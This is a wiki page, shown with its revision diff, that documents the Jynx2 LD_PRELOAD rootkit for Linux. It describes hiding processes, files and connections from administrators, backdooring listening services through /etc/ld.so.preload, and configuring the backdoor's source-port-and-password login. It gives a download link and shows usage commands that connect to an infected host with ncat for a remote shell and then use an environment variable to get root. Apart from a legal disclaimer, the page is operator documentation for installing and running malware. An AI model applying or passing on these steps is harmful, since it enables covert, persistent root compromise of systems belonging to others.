Difference between revisions of "Jynx Rootkit/2.0"
(→MULTI-FACTOR AUTHENTICATION) |
(→MULTI-FACTOR AUTHENTICATION) |
||
Line 75: | Line 75: | ||
The CONFIG_FILE defaults to ld.so.preload, which is commonly located in the /etc directory. Alternatively, services can be backdoored by setting the [[LD_Preload|LD_PRELOAD]] environment variable if overwriting /etc/ld.so.preload is unfavorable. | The CONFIG_FILE defaults to ld.so.preload, which is commonly located in the /etc directory. Alternatively, services can be backdoored by setting the [[LD_Preload|LD_PRELOAD]] environment variable if overwriting /etc/ld.so.preload is unfavorable. | ||
==MULTI-FACTOR AUTHENTICATION== | ==MULTI-FACTOR AUTHENTICATION== | ||
− | {{notice|'''<i>Jynx2 uses two-factor [[authentication credentials|authentication]]. </i>'''{{code|text=With Jynx2, the MAGIC_ACK/MAGIC_SEQ port-knocking authentication method was deprecated in | + | {{notice|'''<i>Jynx2 uses two-factor [[authentication credentials|authentication]]. </i>'''{{code|text=With Jynx2, the MAGIC_ACK/MAGIC_SEQ port-knocking authentication method was deprecated in favor of HIGH_PORT, LOW_PORT, and an accept() hook. This means that Jynx2 can backdoor any existing listening service without interrupting normal user interactivity for that service.}}}} |
The first are '''HIGH_PORT''' and '''LOW_PORT''', which default to 41, and 43 respectively. The source port of a client connection must fall between this port range in order to activate Jynx2's accept() hook. Because this port is typically reserved for inbound connections, it is rare that any connection will randomly have this origin port. | The first are '''HIGH_PORT''' and '''LOW_PORT''', which default to 41, and 43 respectively. The source port of a client connection must fall between this port range in order to activate Jynx2's accept() hook. Because this port is typically reserved for inbound connections, it is rare that any connection will randomly have this origin port. | ||
The second factor in Jynx2 authentication is SHELL_PASSWORD. This should be the first line sent to the backdoor upon connecting, defaulting to "'''DEFAULT_PASS'''", it should be changed before compilation. | The second factor in Jynx2 authentication is SHELL_PASSWORD. This should be the first line sent to the backdoor upon connecting, defaulting to "'''DEFAULT_PASS'''", it should be changed before compilation. |
Revision as of 03:26, 17 March 2012
Jynx2 is an expansion of the original Jynx LD_Preload rootkit written in C with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features. |
It is a crime to use techniques or tools on this page against any system without written authorization unless the system in question belongs to you |
_ _,.-.' .-. _ .' |,' ."".| |.""._ ( || ,',"". `._`' ` ' `. `\ | `" .-"`-..` . `. | `..--.._ | \ _,| _...'_.' ,+. `. ,""'| `...-'..""(__.._ -" `"--.. `. |`._,' ,' /\ .'""` .'""`. `. | `. \ ' / / / || || |.`.`. . | \ `.__,'-._' /|` -"' `-.' \ \ \ `"-' \ ' `. / /_| | |'""| | .-""'`'"`-,.-"\ . . / .\ . / | | `._.' || ,' \ \ ' / / |/ /_.-+._`-..--"-. . . \ ` / /.' ' ,'""'-. `"."'""'`.. |. \ \ / . | j . . | |\__," |. ` ' \ . | | | | ' | '| | ' ` \ \ . | | | `.____,' ..____,' | | . \ | | | | ._ _..---._ _,' | . ' | | | | | "" . |`"' \ `.| ' ' ' . | | | | | | | ` ` . . \ | | | | | | ' | \ `. | | . | ' ' | | | . ` \ \ | | | | \ ` | | | . `. | | | | \ \ ' | ` ' ` `+..|___|___|_........ \ \ \| ' . `. `. | `. \ . . ` `. `-. .' _,'`. \' . \ `-.._ `._ ,' _." `._ `.` | . `._ . `._ _,`"--`. | . `. | `-._ ,' | `. `|_ ,' | | `. `. .' __...__.| | \ __..._ _,..,.__ `. `-`"' `._..--'-.__ .' `-..' ``'"--..-' `"---' /$$$$$ /$$ /$$ /$$ /$$ |__ $$ | $$ /$$/|__/ | $$ | $$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ /$$/ /$$ /$$$$$$ | $$| $$ | $$| $$__ $$| $$ /$$//$$$$$$| $$$$$/ | $$|_ $$_/ /$$ | $$| $$ | $$| $$ \ $$ \ $$$$/|______/| $$ $$ | $$ | $$ | $$ | $$| $$ | $$| $$ | $$ >$$ $$ | $$\ $$ | $$ | $$ /$$ | $$$$$$/| $$$$$$$| $$ | $$ /$$/\ $$ | $$ \ $$| $$ | $$$$/ \______/ \____ $$|__/ |__/|__/ \__/ |__/ \__/|__/ \___/ /$$ | $$ | $$$$$$/ \______/
Contents
Features
- Hiding from netstat
- Hiding from ps/top and /proc
- File hiding
- SSL connect accept() hook
- Multi-factor authentication
- Improved anti-removal features
- SUID Drop-shell with environment variable
Archive Contents
[root@ares jynx2]# ls Makefile README config.h jynx2.c packer.sh reality.c
In this rendition of jynx, two shared libraries are built by the installation process. One, jynx2.so functions as the actual rootkit, while the other, reality.so, functions as a method for the remote access user to be able to see their own files and processes. |
Configuration Options in Config.h
Improper configuration of Jynx2 can result in severe system instability, including segmentation faults of nearly every process on the infected host. |
MAGIC_STRING
- MAGIC_STRING is the name of the directory that jynx installs to from the top level directory /. By default, this directory is hidden from the root user via the magic UID and GID. If the MAGIC_STRING is set to "hiddendir", jynx2 will install to (and hide) the folder "/hiddendir".
this can be used as a prefix to any files or processes that the user wishes to hide; it is not limited exclusively to Jynx2's installation directory. |
MAGIC_GID and MAGIC_UID
- Similar to the original Jynx Rootkit, Jynx2 will automatically hide processes, files, and connections owned by the magic UID or GID.
REALITY_PATH
This is the path where reality.so will be copied to. By default, Jynx2 will install this into /XxJynx/reality.so.
CONFIG_FILE
The CONFIG_FILE defaults to ld.so.preload, which is commonly located in the /etc directory. Alternatively, services can be backdoored by setting the LD_PRELOAD environment variable if overwriting /etc/ld.so.preload is unfavorable.
MULTI-FACTOR AUTHENTICATION
With Jynx2, the MAGIC_ACK/MAGIC_SEQ port-knocking authentication method was deprecated in favor of HIGH_PORT, LOW_PORT, and an accept() hook. This means that Jynx2 can backdoor any existing listening service without interrupting normal user interactivity for that service. |
The first are HIGH_PORT and LOW_PORT, which default to 41, and 43 respectively. The source port of a client connection must fall between this port range in order to activate Jynx2's accept() hook. Because this port is typically reserved for inbound connections, it is rare that any connection will randomly have this origin port. The second factor in Jynx2 authentication is SHELL_PASSWORD. This should be the first line sent to the backdoor upon connecting, defaulting to "DEFAULT_PASS", it should be changed before compilation.
LIBC_PATH
LIBC_PATH is set in config.h and defines the path to the libc binary, which can be obtained by using ldd against any common coreutil or binutil. In order to locate this, simply run ldd $(which ls) or something similar.
ENV_VARIABLE
A new feature in Jynx2 is the ability to drop a local suid shell using an environment variable as defined in the configuration. When this environment variable is set, SUID executables will grant root access to the local machine for privilege escalation by the remote user.
Download & Installation
It is highly recommended that configuration be changed before compiling or installing Jynx2 to any device. |
It is a crime to use techniques or tools on this page against any system without written authorization unless the system in question belongs to you |
- Download URL: http://blachatacademy.org/jynx2.tgz
Usage
Once Jynx2 is successfully installed on a target machine, accessing it's accept() hook with the default configuration looks like:
[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl DEFAULT_PASS Bump with shell. >ls -lia 214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 . 177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..
By default, with XxJynx as the ENV_VARIABLE configuration:
>XxJynx=1 gpasswd / >id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
Further Reading
|